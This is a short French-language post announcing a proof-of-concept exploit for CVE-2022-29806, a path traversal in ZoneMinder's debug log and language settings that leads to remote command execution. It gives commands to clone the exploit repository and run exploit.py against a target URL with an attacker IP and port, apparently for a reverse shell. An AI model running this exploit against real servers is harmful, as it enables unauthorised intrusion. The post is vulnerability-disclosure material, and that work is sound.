
ZoneMinder jusqu'à 1.36.12 Escalade de privilèges par langage (et RCE) - Poc Exploit
ZoneMinder jusqu'à 1.36.12 Escalade de privilèges de langue (et RCE)

Une vulnérabilité de Path Traversal dans le fichier de journal de débogage et l'option de langue par défaut dans les versions de ZoneMinder antérieures à 1.36.13 et 1.37.11 permet aux attaquants d'écrire et d'exécuter du code arbitraire pour parvenir à une exécution de commande à distance.
« La preuve de concept a été testée sur ZoneMinder 1.36.4 ubuntu18.04 docker: ZoneMinder/zmdockerfiles mais reste applicable jusqu'à la dernière version 1.36.12 »
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel a découvert la vulnérabilité.